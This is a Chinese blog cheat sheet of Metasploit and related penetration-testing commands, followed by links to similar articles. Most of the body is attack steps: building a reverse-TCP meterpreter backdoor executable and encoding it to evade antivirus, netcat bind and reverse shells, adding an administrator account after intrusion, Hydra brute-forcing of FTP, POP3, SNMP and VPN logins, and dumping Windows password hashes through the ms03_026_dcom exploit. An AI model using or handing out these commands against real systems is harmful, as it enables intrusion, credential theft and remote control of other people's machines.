metasploit常用渗透命令

最新推荐文章于 2023-03-06 18:13:58 发布
最新推荐文章于 2023-03-06 18:13:58 发布
阅读量1.2k 收藏 3
点赞数
分类专栏: Hacking 文章标签: windows shell jobs import sqlite 工作
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/god_7z1/article/details/7682980
版权
svn update 升级

./msfweb Web接口127.0.0.1:55555。.
./msfconsole 字符下的Console。
help 帮助
show <option> 显示选项
search <name> 搜索名字
use <exploit name> 使用漏洞
show options 显示选项
set <OPTION NAME> <option> 设置选项
show payloads 显示装置
set PAYLOAD <payload name> 设置装置
show options 显示选项
set <OPTION NAME> <option> 设置选项
show targets 显示目标(os版本)
set TARGET <target number> 设置目标版本
exploit 开始漏洞攻击
sessions -l 列出会话
sessions -i <ID> 选择会话
sessions -k <ID> 结束会话
<ctrl> z 把会话放到后台
<ctrl> c 结束会话
jobs 列出漏洞运行工作
jobs -K 结束一个漏洞运行工作
show auxiliary 显示辅助模块
use <auxiliary name> 使用辅助模块
set <OPTION NAME> <option> 设置选项
run 运行模块
scanner/smb/version 扫描系统版本
scanner/mssql/mssql_ping 测试mssql是否在线
scanner/mssql/mssql_login 测试登录(暴力或字典)
Attacker behind firewall: bind shell正向
Target behind firewall: reverse shell反向
Meterpreter衔接不懂dos的可以用这个:
db_import_nessus_nbe 加载nessus的扫描结果
db_import_nmap_xml 加载nmap的扫描结果
自动化攻击流程:
cd /pentest/exploit/framework3
./msfconsole
load db_sqlite3
db_destroy pentest
db_create pentest
db_nmap targetIP
db_hosts
db_services
db_autopwn -t -p -e
字符接口攻击流程:
./msfcli | grep -i <name>
./msfcli <exploit or auxiliary> S
./msfcli <exploit name> <OPTION NAME>=<option> PAYLOAD=<payload name> E
做木马后门等:
./msfpayload <payload> <variable=value> <output type>
S summary and options of payload
C C language
P Perl
y Ruby
R Raw, allows payload to be piped into msfencode and other tools
J JavaScript
X Windows executable
./msfpayload windows/shell/reverse_tcp LHOST=10.1.1.1 C
./msfpayload windows/meterpreter/reverse_tcp LHOST=10.1.1.1 LPORT=4444 X > evil.exe
编码处理就是做免杀:
./msfencode <options> <variable=value>
./msfpayload linux_ia32_bind LPORT=4444 R | ./msfencode -b ‘x00′ -l
./msfpayload linux_ia32_bind LPORT=4444 R | ./msfencode -b ‘x00′ -e PexFnstenvMor -t c

入侵后在windows下添加管理员用户:
hostname 查看主机名
net users 查看用户
net user 用户密码 /add 添加用户
net localgroup 查看工作组
net localgroup administrators 查看管理员组
net localgroup administrators x /add 将用户加入管理员组

TFTP
cp /pentest/windows-binaries/tools/nc.exe /tmp/传递到tftp上
tftp -i 10.1.1.2 GET nc.exe下载

netcat瑞士军刀
attacker: 10.1.1.1
target: 10.1.1.2
nc -v -z 10.1.1.2 1-1024 端口扫描
target: nc -lvp 4444 聊天设置(服务)
attacker: nc -v 10.1.1.2 4444 聊天设置(客户)
target: nc -lvp 4444 > output.txt传输文件(接受)
attacker: nc -v 10.1.1.2 4444 < test.txt传输文件(发送)
target: nc -lvp 4444 -e cmd.exe Bind shell。
attacker: nc -v 10.1.1.2 4444
target:nc -lvp 4444 Reverse shell。
attacker:nc -v 10.1.1.2 4444 -e /bin/bash

密码
字典zcat /pentest/password/dictionaries/wordlist.txt.Z > words
cat words | wc -l显示个数(30多万个)
暴力:
hydra -l ftp -P words -v targetIP ftp 攻击ftp。
hydra -l muts -P words -v targetIP pop3 攻击pop3
hydra -P words -v targetIP snmp 攻击snmp
攻击microsof VPN
nmap -p 1723 targetIP
dos2unix words
cat words | thc-pptp-bruter targetIP
WYD:
wget -r  www.target.com  –accept=pdf 下载pdf文档
wyd.pl -o output.txt  www.target.com/
cat output.txt | more
SAM文件(windows下的密码文件):
%SYSTEMROOT%/system32/config
%SYSTEMROOT%/repair
备份windows的hash文件:
./msfcli exploit/windows/dcerpc/ms03_026_dcom RHOST=targetIP PAYLOAD=windows/meterpreter/bind_tcp E
meterpreter > upload -r /tmp/pwdump6 c:windowssystem32
meterpreter > execute -f cmd -c
meterpreter > interact x
C:WINDOWSsystem32> pwdump 127.0.0.1
7禧
关注
专栏目录
Metasploit 数据库渗透测试实战
悦分享
12-15 1155
当Web服务器中有大量的信息需要频繁更新的时候,就使用到数据库技术了。实际上数据库技术的历史要比Web还要久远,早在20世纪60年代数据库就作为计算机科学的一个重要分支兴起,它取代了之前的文件系统存储。作为Web服务器的核心组成部分,数据库往往保存了大量的重要信息,如何保证这些信息的安全性也成为十分重要的研究重点。如果你关注网络安全方面的新闻,应该会经常听到“拖库”“撞库”和“洗库”这些词语,它们其实都是针对数据库的攻击行为。
metasploit常用命令
Johnathan的博客
03-03 571
metasploit常用命令 service apache2 start service postgresql start msfconsole启动 1.MSF终端命令 show exploit 列出metasploit框架中的所有渗透攻击模块。 show payloads 列出metasploit框架中的所有攻击载荷。 show auxiliary 列出metasploit框架中的所有辅助攻击模块。 search name 查找metasploit框架中的所有渗透攻击和其他模块。
Metasploit常用命令
weixin_43733912的博客
10-22 523
Metasploit基本命令 Metasploit入坑到放弃 特别说明:本笔记仅供安全研究使用,如有其他行为后果自负 环境 Kali 2019 目录: 开启控制台 搜索模块 调用模块 查看模块使用方法 设置目标IP地址 设置目标端口 exploit 总结 开启控制台 命令: msfconsole 搜索模块 命令: search ms17-010 # 模块名 这里以搜索 ms17-010 为例, auxiliary 开头的为测试模块,也就是 POC,看看存不存在漏洞, exploit 开头的为攻击
Metasploit (MSF) 使用:包含基本使用、payload生成、后渗透模块使用
Alone hackers的博客
03-06 4937
Metasploit (MSF) 使用:包含基本使用,payload生成,后渗透模块使用。
Metasploit初级篇
qq_49694748的博客
01-07 715
1、metasploit模块 2、metasploit与postgresql数据库 3、数据库内容记录 4、脚本资源文件 5、工作空间 workspace 6、metasploit参数 7、handler、Jobs、session命令的使用 8、数据库导入导出操作 9、认证信息creds 1、metasploit模块 exploit(渗透模块):运行时会对目标的安全漏洞进行安全测试 payload(载荷模块):exploit成功后会运行设置的payload以获取目标机器的权限和
Metasploit(MSF)渗透测试框架使用教程及基本命令
qq_44433172的博客
05-30 4020
第一章 Metasploit渗透框架介绍及体系框架 1.1 Metasploit 渗透测试框架介绍   Metasploit 是一个渗透测试工具,也是信息安全与渗透测试领域最大的开源项目之一。使您能够查找,利用和验证漏洞。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。Metasploit的设计初衷是打造成一个攻击工具开发平台。 1.2 Metasploit 体系框架  模块:模块组织按照不同的用途分为6种类型的模块 分为辅助模块(Aux)、渗透攻击模块(Exploits)、后渗透攻击模块(Post)
metasploit 初学(一)
小山岷的专栏
11-24 2万+
每个人都有死穴,在武侠片中经常可以看到,点到某人死穴,轻者此人被控、武功被废,重则当场瘫痪或毙命。可以参考武侠片各种大侠。 对于系统而言,存在有或多或少的漏洞,而这些漏洞则很容易被攻击者利用,并成功渗透入主机。 只有了解如何渗透,才能进行反渗透metasploit渗透测试很流行的工具,最近开始记录学习metasploit的过程: 一 安装: 1 对于64位系统: wget h
metasploit常用渗透命令.zip
最新发布
09-16
本资料“metasploit常用渗透命令”主要聚焦于Metasploit框架中的常用命令,帮助用户理解和掌握其核心功能。 在Metasploit框架中,主要涉及以下几个关键概念: 1. **Meterpreter**:Meterpreter是一种动态的、功能...
metasploit常用渗透命令[文].pdf
10-11
以下是一些关于Metasploit常用渗透命令的详细解释: 1. **升级命令**:`svn update` 是用来更新Metasploit框架到最新版本的,确保你使用的工具是最新的,可以修复已知问题并包含最新的漏洞利用。 2. **启动Web接口...
Metasploit渗透测试指南:常用命令详解
本文将详细介绍一些常用Metasploit命令,帮助用户更好地理解和使用这个工具。" 在渗透测试过程中,Metasploit框架是必不可少的工具之一。它包含了大量的exploits(漏洞利用模块)和payloads(有效载荷),用于...
termux安装metasploit
baibaigao的博客
11-28 1万+
详情参考termux官方文档:https://wiki.termux.com/wiki/Metasploit_Framework
Metasploit 常用命令手册
weixin_30807677的博客
07-31 526
Installation curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall &am...
使用websploit在局域网全自动渗透
weixin_30919919的博客
01-23 421
原理为 websploit调用dnsdpoof进行dns欺骗配合神器metasploit的web_autopwn模块进行渗透;特点:过程基本全自动。 终端输入websploit打开websploit;输入show modules查看所有模块: 查看到有exploit/browser_autopwn模块和exploit/java_applet模块可以使用(新版meta...
Metasploit渗透测试指南》命令参考列表
weixin_38169786的博客
08-09 873
1.MSF终端命令 show exploit 列出metasploit框架中的所有渗透攻击模块。 show payloads 列出metasploit框架中的所有攻击载荷。 show auxiliary 列出metasploit框架中的所有辅助攻击模块。 search name 查找metasploit框架中的所有渗透攻击和其他模块。 info 展示出制定渗透攻击或模...
Metasploit之——基本后渗透命令
冰河的专栏
01-27 5083
转载请注明出处:https://blog.csdn.net/l1028386804/article/details/86666319 核心Meterpreter命令指的是已经被Meterpreter攻击载荷成功渗透的计算机向我们提供的用于后渗透操作的基本功能。 注意:Metasploit的后渗透命令都是在拿到了目标主机的Meterpreter权限之后,在Meterpreter命令行下执行的各种...
常用metasploit命令
如鹿渴慕泉水的专栏
09-09 4303
-----------------------------------------openvas--------------------------------------------------------------------------------------------------------- gsad --listen=0.0.0.0 --port=5687  netstat -
Metasploit Framework的使用说明
我喜欢某某某的专栏
07-22 3616
 Metasploit Framework 下载地址:http://metasploit.com/命令行下使用Metasploit运行后首先看到的是Metasploit欢迎界面,我们输入“?”得到在线帮助(如图1所示):图1可以看到里面有很多的命令,下面我将最重要的几个做简单解释:    “?”:得到帮助。    “cd”:更换当前的工作目录。    “exit”:退出。 
metasploit介绍及使用
热门推荐
weixin_43873557的博客
02-07 2万+
The Metasploit Framework的简称。MSF高度模块化,即框架由多个module组成,是全球最受欢迎的工具。 是一款开源安全漏洞利用和测试工具,集成了各种平台上常见的溢出漏洞和流行的shellcode,并持续保持更新。 metasploit涵盖了渗透测试中全过程,你可以在这个框架下利用现有的Payload进行一系列的渗透测试。 目录 kali-metasploit框架目录路径: /opt/metasploit-framework/embedded/framework/ /usr/share
metasploit的模块构成及功能分析
xysoul的专栏
04-07 1万+
metasploit的模块构成及功能分析 今天我们介绍一下metasploit的基础架构和 市面上介绍metasploit的书不少,网上metasploit的使用说明的文章更是满天飞,可是没有哪一本书或者哪一篇文章来介绍metasploit的目录结构和他的功能,今天我们就来介绍一下metasploit的文件结构和每个部分的功能以及参数。 exploit@ubuntu:/pentest/f
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值